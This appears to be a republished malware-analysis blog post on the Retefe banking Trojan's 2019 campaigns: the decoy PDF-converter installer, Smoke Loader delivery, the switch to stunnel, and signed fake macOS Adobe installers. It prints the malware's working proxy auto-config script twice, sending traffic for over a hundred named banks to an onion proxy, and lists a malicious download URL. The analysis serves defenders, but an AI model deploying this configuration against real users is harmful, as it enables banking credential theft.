Retefe is a banking Trojan that historically has routed online banking traffic intended for targeted banks through a proxy instead of the web injects more typical of other bankers. In the past, Retefe campaigns have targeted Austria, Sweden, and Switzerland, among other regions, such as users of UK online banking sites. Retefe is generally delivered via zipped JavaScript as well as Microsoft Word documents [1].

Although Retefe only appeared infrequently in 2018, the banker returned to more regular attacks on Swiss and German victims in April of 2019 with both a Windows and macOS version.

Retefe’s return to the landscape was marked by several noteworthy changes:

  • Using stunnel instead of TOR to secure its proxy redirection and command and control communications
  • The use of Smoke Loader rather than sLoad as an intermediate loader
  • The abuse of a shareware application known as “Convert PDF to Word Plus 1.0”; this is a Python script that has been packaged as an executable using PyInstaller and packed into an archive using the UPX packing engine.

Abused Shareware as Part of the Retefe Installation Stack

Proofpoint researchers identified the abused shareware application in a public malware repository in March 2019. It originates from http://lettercreate.com/unipdf/convert-pdf-to-word-plus[.]exe and uses a certificate issued by DigiCert.

The CCN is “BULDOK LIMITED/emailAddress=admin@buldoklimited[.]info”.

Figure 1 shows the resulting Python code once the executable has been unpacked, unpackaged, and decompiled.

Figure 1: Resulting Python code when convert-pdf-to-word-plus.exe is unpacked, unpackaged, and decompiled.

The Python script writes two files named convert-pdf-to-word-plus.exe and convert-pdf-to-word-plus_driver.exe to the %TEMP% directory and executes them.

We currently believes that the convert-pdf-to-word-plus.exe file is a legitimate installer for the “Convert PDF to Word Plus” application (Figure 2) and is executed as a decoy.

Figure 2: Convert PDF to Word Plus Installer

Convert-pdf-to-word-plus_driver.exe, on the other hand, is malicious and is Retefe’s loader. As can be seen in Figure 3, the loader extracts 7-Zip and stunnel from its resources then decrypts and executes the main Retefe JavaScript code.

Figure 3: Retefe Loader

As shown in the figure above, Retefe extracts stunnel via a compressed archive in place of the usual TOR Socat proxy. In addition to the use of the decoy abused shareware, this is the most significant observed change to Retefe’s behavior, along with the use of Smoke Loader.

Smoke Loader Now Bootstraps Retefe

On  April 17, Proofpoint researchers observed a geographically targeted campaign against Switzerland using the email lure below (Fig. 4). This campaign used an Object Linking and Embedding (OLE) package to deliver Smoke Loader.

Approximately two hours following infection, we observed Smoke Loader downloading Retefe with the following hash:


Figure 4: Lure document used to drop Smoke Loader, which in turn downloads Retefe

A copy of the Retefe dropper PowerShell script can be downloaded here for further analysis:


This script contains the content required for Retefe persistence, including the scheduled tasks for 7-Zip and the stunnel secure tunneling software.

Secure Tunneling (stunnel) Replaces Tor

It is not clear why Retefe’s authors have now deprecated Tor in favor of stunnel. However, we suspect that the use of a dedicated tunnel rather than Tor makes for a more secure connection because it eliminates the possibility of snooping on the hops between Tor nodes. Tor is also a “noisier” protocol and thus would be easier to detect in an enterprise environment than stunnel, which would appear as any other outbound SSL connection.

Proxy Information From the Retefe Binary

Below is a portion of the proxy configuration that lists the online banking sites whose users are targeted by this instance of Retefe. The complete proxy configuration is in the appendix.

function FindProxyForURL(url, host) {

   var proxy = "PROXY ltro3fxssy7xsqgz.onion:5588;";

   var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',
     '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', .


'*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');

   for (var i = 0; i < hosts.length; i++) {

       if (shExpMatch(host, hosts[i])) {

           return proxy




Malware Masquerading as Adobe Installer Applications

Figure 5: macOS Adobe Cloud installer

Unlike the Retefe campaigns targeting Microsoft Windows hosts until December 2018, campaigns targeting macOS have continued throughout the first several months of 2019. These campaigns continued to use developer-signed versions of fake Adobe Installers in order to deliver their payloads.

Below is the signature used to sign the Retefe binary. By using signed binaries, actors attempt to bypass the macOS internal Gatekeeper security application, which checks if applications are signed by a valid developer certificate before running. The output was created by running the command codesign -dv –verbose=4 on the installer binary.

Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=341 flags=0x0(none) hashes=10+3 location=embedded
Hash type=sha1 size=20
CandidateCDHash sha1=f839edca246ddf3881cb3f2821a900b252330a59
Hash choices=sha1
Page size=4096
Signature size=8525
Authority=Developer ID Application: Oleg Kosourov (Q9HZ55M855)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jan 21, 2019, 3:43:51 AM
Info.plist entries=23
Sealed Resources version=2 rules=12 files=5
Internal requirements count=1 size=180

Gatekeeper enforces application integrity by checking the validity of the Developer ID associated with an application. When an app is created, it is digitally signed with a certificate and the associated name of the developer. The notarization status verifies the application is from the identified developer and has not been changed. Further changes by Apple in macOS Mojave include app notarization, an additional integrity check for the signed application [2].


Retefe is unusual in its use of proxies to redirect victims to fake bank pages for credential theft instead of employing web injects for man-in-the-browser attacks like most banking Trojans. Developers appear to have updated key features of the Trojan and are employing new distribution mechanisms including fake apps and switching to Smoke Loader as its intermediate downloader after a fairly lengthy absence from the landscape. Retefe in particular is noted for changing its proxy configuration, having previously used Profixifier and in 2019 moving to stunnel. As with many types of malware, developers continue to innovate, identifying new, more effective ways to infect victims and steal personal information to better monetize their attacks.


[1] https://www.govcert.admin.ch/blog/33/the-retefe-saga

[2] https://support.apple.com/en-us/HT202491


Special thanks to @JaromirHorejsi for assistance sourcing samples of Retefe

Indicators of Compromise (IOCs)


IOC Type




Fake convert-pdf-to-word-plus.exe



Legitimate convert-pdf-to-word-plus.exe



Retefe Loader (convert-pdf-to-word-plus_driver.exe)


Certificate Hash

DigiCert Certificate






















macOS dmg files masquerading as Adobe installer.



Backdoored application



Smoke Loader downloaded Retefe



SmokeLoader Document







SmokeLoader c2




ET and ETPRO Suricata/Snort Signatures

2835551 ETPRO TROJAN Observed SmokeLoader Style Connectivity Check

2022130 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Retefe CnC)


Full proxy configuration

function FindProxyForURL(url, host) {

   var proxy = "PROXY ltro3fxssy7xsqgz.onion:5588;";

   var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',
'*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', '*credit-suisse.com', '*.clientis.ch',
'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', 
'*eek.ch','*szkb.ch', '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', '*bcf.ch', 
'*bcv.ch', '*juliusbaer.com', '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch', 
'*bankthalwil.ch', '*piguetgalland.ch', '*inlinea.ch', '*bernerlandbank.ch', '*bancasempione.ch', 
'*bsibank.com', '*corneronline.ch', '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch', 
'*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', '*ersparniskasse.ch', '*ekr.ch', 
'*sparkasse-dielsdorf.ch', '*.eki.ch', '*bankgantrisch.ch', '*bbobank.ch', '*alpharheintalbank.ch', 
'*aekbank.ch', '*acrevis.ch', '*credinvest.ch', '*zarattinibank.ch', '*appkb.ch', '*arabbank.ch', 
'*apbank.ch', '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', '*bordier.com', 
'*banquethaler.com', '*bankzimmerberg.ch', '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch', 
'*banquecramer.ch', '*banqueduleman.ch', '*ebankingch.bcp.bank', '*bil.com', '*vontobel.com', 
'*pbgate.net', '*bnpparibas.com', '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch', 
'*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', '*cbhbank.com', '*coutts.com', 
'*cimbanque.net', '*commerzbank.com', '*dominickco.ch', '*efginternational.com', '*falconpb.com', 
'*gemeinschaftsbank.ch', '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', '*ca-nextbank.ch', 
'*hsbcprivatebank.com', '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', '*maerki-baumann.ch', 
'*mirabaud.com', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', '*reyl.com', '*saanenbank.ch', 
'*sebgroup.com', '*slguerbetal.ch', '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', '*slwynigen.ch', 
'*sparkasse.ch', '*umtb.ch', '*trafina.ch', '*ubp.com', 'direct.directnet.com', '*tkb.ch', 
'onlinebanking.directnet.com', 'onlinebanking.nab.ch', 'onlinebankingbusiness.nab.ch', '*cler.ch', 
'mabanque.bnpparibas', '*llb.li', '*bankfrick.li', '*vpbank.com', '*bankalpinum.com', '*unionbankag.com', 
'*neuebankag.li', '*raiffeisen.li', '*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');

   for (var i = 0; i < hosts.length; i++) {

       if (shExpMatch(host, hosts[i])) {

           return proxy



Subscribe to our Blog & Newsletter!

Subscribe to our Blog & Newsletter!

Join our mailing list to receive the latest news and updates from our team. We will give you the latest tech articles and updates on our new products!

You have Successfully Subscribed!

Netsafe Client Support Portal

For current clients to communicate their IT issues

Submit a Ticket

Having a technical issue? Submit a ticket to our helpdesk here and a tech will be on your case.

Establish a Remote Connection

Share your screen with our IT helpdesk techs so we can diagnose your issues.

Check the Status of your Support Ticket

Log in to our helpdesk portal to check the status of your ticket.